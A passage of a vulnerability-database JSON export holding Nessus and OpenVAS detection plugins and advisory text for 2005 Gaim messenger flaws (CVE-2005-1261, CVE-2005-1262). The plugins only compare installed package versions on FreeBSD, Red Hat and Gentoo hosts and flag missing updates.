value:\"p-cpe:/a:freebsd:freebsd:ru-gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"gaim<1.3.0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-gaim<1.3.0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ko-gaim<1.3.0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-gaim<1.3.0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:09:57", "references": ["http://gaim.sourceforge.net/security/index.php?id=17", "http://www.nessus.org/u?f97413f8"], "pluginID": "19077", "description": "The GAIM team reports :\n\nPotential remote denial of service bug resulting from not checking a pointer for non-NULL before passing it to strncmp, which results in a crash. This can be triggered by a remote client sending an SLP message with an empty body.", "edition": 4, "reporter": "Tenable", "published": "2005-07-13T00:00:00", "title": "FreeBSD : gaim -- MSN remote DoS vulnerability (ad5e70bb-c429-11d9-ac59-02061b08fc24)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1262"], "modified": "2013-06-22T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:ko-gaim", "p-cpe:/a:freebsd:freebsd:gaim", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:ja-gaim", "p-cpe:/a:freebsd:freebsd:ru-gaim"], "id": "FREEBSD_PKG_AD5E70BBC42911D9AC5902061B08FC24.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=19077", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2013 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(19077);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2013/06/22 00:06:25 $\");\n\n script_cve_id(\"CVE-2005-1262\");\n\n script_name(english:\"FreeBSD : gaim -- MSN remote DoS vulnerability (ad5e70bb-c429-11d9-ac59-02061b08fc24)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The GAIM team reports :\n\nPotential remote denial of service bug resulting from not checking a\npointer for non-NULL before passing it to strncmp, which results in a\ncrash. This can be triggered by a remote client sending an SLP message\nwith an empty body.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://gaim.sourceforge.net/security/index.php?id=17\"\n );\n # http://www.freebsd.org/ports/portaudit/ad5e70bb-c429-11d9-ac59-02061b08fc24.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f97413f8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ja-gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ko-gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:ru-gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2013 Tenable Network Security, Inc.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"gaim<1.3.0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ja-gaim<1.3.0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ko-gaim<1.3.0\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"ru-gaim<1.3.0\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:40:37", "references": ["http://rhn.redhat.com/errata/RHSA-2005-432.html", "https://www.redhat.com/security/data/cve/CVE-2005-0472.html", "https://www.redhat.com/security/data/cve/CVE-2005-1261.html"], "pluginID": "18241", "description": "An updated gaim package that fixes security issues is now available for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nThe Gaim application is a multi-protocol instant messaging client.\n\nA stack based buffer overflow bug was found in the way gaim processes a message containing a URL. A remote attacker could send a carefully crafted message resulting in the execution of arbitrary code on a victim's machine. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-1261 to this issue.\n\nA bug in the way Gaim processes SNAC packets was discovered. It is possible that a remote attacker could send a specially crafted SNAC packet to a Gaim client, causing the client to stop responding. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2005-0472 to this issue.\n\nUsers of Gaim are advised to upgrade to this updated package which contains gaim version 0.59.9 with backported patches to correct these issues.", "edition": 5, "reporter": "Tenable", "published": "2005-05-11T00:00:00", "title": "RHEL 2.1 : gaim (RHSA-2005:432)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0472", "CVE-2005-1261"], "modified": "2016-12-28T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:gaim"], "id": "REDHAT-RHSA-2005-432.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=18241", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2005:432. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(18241);\n script_version (\"$Revision: 1.17 $\");\n script_cvs_date(\"$Date: 2016/12/28 17:55:18 $\");\n\n script_cve_id(\"CVE-2005-0472\", \"CVE-2005-1261\");\n script_xref(name:\"RHSA\", value:\"2005:432\");\n\n script_name(english:\"RHEL 2.1 : gaim (RHSA-2005:432)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated gaim package that fixes security issues is now available\nfor Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe Gaim application is a multi-protocol instant messaging client.\n\nA stack based buffer overflow bug was found in the way gaim processes\na message containing a URL. A remote attacker could send a carefully\ncrafted message resulting in the execution of arbitrary code on a\nvictim's machine. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2005-1261 to this issue.\n\nA bug in the way Gaim processes SNAC packets was discovered. It is\npossible that a remote attacker could send a specially crafted SNAC\npacket to a Gaim client, causing the client to stop responding. The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2005-0472 to this issue.\n\nUsers of Gaim are advised to upgrade to this updated package which\ncontains gaim version 0.59.9 with backported patches to correct these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2005-0472.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2005-1261.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2005-432.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected gaim package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gaim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/05/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2005:432\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"gaim-0.59.9-4.el2\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gaim\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:49:49", "references": [], "pluginID": "54941", "description": "The remote host is missing updates announced in\nadvisory GLSA 200505-09.", "edition": 2, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-24T00:00:00", "title": "Gentoo Security Advisory GLSA 200505-09 (gaim)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Gentoo Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1262", "CVE-2005-1261"], "modified": "2017-07-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=54941", "id": "OPENVAS:54941", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Gaim contains two vulnerabilities, potentially resulting in the execution\nof arbitrary code or Denial of Service.\";\ntag_solution = \"All Gaim users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-im/gaim-1.3.0'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200505-09\nhttp://bugs.gentoo.org/show_bug.cgi?id=91862\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200505-09.\";\n\n \n\nif(description)\n{\n script_id(54941);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2005-1261\", \"CVE-2005-1262\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200505-09 (gaim)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-im/gaim\", unaffected: make_list(\"ge 1.3.0\"), vulnerable: make_list(\"lt 1.3.0\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:22", "references": [], "pluginID": "52702", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "FreeBSD Ports: gaim, ja-gaim, ko-gaim, ru-gaim", "type": "openvas", "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1261"], "modified": "2016-09-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=52702", "id": "OPENVAS:52702", "sourceData": "#\n#VID 889061af-c427-11d9-ac59-02061b08fc24\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n gaim\n ja-gaim\n ko-gaim\n ru-gaim\n\nCVE-2005-1261\n** RESERVED **\nThis candidate has been reserved by an organization or individual that\nwill use it when announcing a new security problem. When the\ncandidate has been publicized, the details for this candidate will be\nprovided.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://gaim.sourceforge.net/security/index.php?id=16\nhttp://www.vuxml.org/freebsd/889061af-c427-11d9-ac59-02061b08fc24.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52702);\n script_version(\"$Revision: 4112 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-19 15:17:59 +0200 (Mon, 19 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_bugtraq_id(13590);\n script_cve_id(\"CVE-2005-1261\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: gaim, ja-gaim, ko-gaim, ru-gaim\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"gaim\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.0\")<0) {\n txt += 'Package gaim version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-gaim\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.0\")<0) {\n txt += 'Package ja-gaim version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ko-gaim\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.0\")<0) {\n txt += 'Package ko-gaim version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-gaim\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.0\")<0) {\n txt += 'Package ru-gaim version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:10:28", "references": [], "pluginID": "52701", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-04T00:00:00", "title": "FreeBSD Ports: gaim, ja-gaim, ko-gaim, ru-gaim", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1262"], "modified": "2016-09-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=52701", "id": "OPENVAS:52701", "sourceData": "#\n#VID ad5e70bb-c429-11d9-ac59-02061b08fc24\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n gaim\n ja-gaim\n ko-gaim\n ru-gaim\n\nCVE-2005-1262\n** RESERVED **\nThis candidate has been reserved by an organization or individual that\nwill use it when announcing a new security problem. When the\ncandidate has been publicized, the details for this candidate will be\nprovided.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://gaim.sourceforge.net/security/index.php?id=17\nhttp://www.vuxml.org/freebsd/ad5e70bb-c429-11d9-ac59-02061b08fc24.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52701);\n script_version(\"$Revision: 4112 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-19 15:17:59 +0200 (Mon, 19 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_bugtraq_id(13591);\n script_cve_id(\"CVE-2005-1262\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"FreeBSD Ports: gaim, ja-gaim, ko-gaim, ru-gaim\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"gaim\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.0\")<0) {\n txt += 'Package gaim version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-gaim\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.0\")<0) {\n txt += 'Package ja-gaim version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ko-gaim\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.0\")<0) {\n txt += 'Package ko-gaim version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-gaim\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.0\")<0) {\n txt += 'Package ru-gaim version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "redhat": [{"lastseen": "2017-09-09T07:19:41", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.2.1-6.el4", "packageName": "gaim", "packageFilename": "gaim-1.2.1-6.el4.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.2.1-6.el4", "packageName": "gaim", "packageFilename": "gaim-1.2.1-6.el4.src.rpm", "arch": "src", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.2.1-6.el4", "packageName": "gaim", "packageFilename": "gaim-1.2.1-6.el4.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.2.1-6.el4", "packageName": "gaim", "packageFilename": "gaim-1.2.1-6.el4.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.2.1-6.el4", "packageName": "gaim", "packageFilename": "gaim-1.2.1-6.el4.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.2.1-6.el4", "packageName": 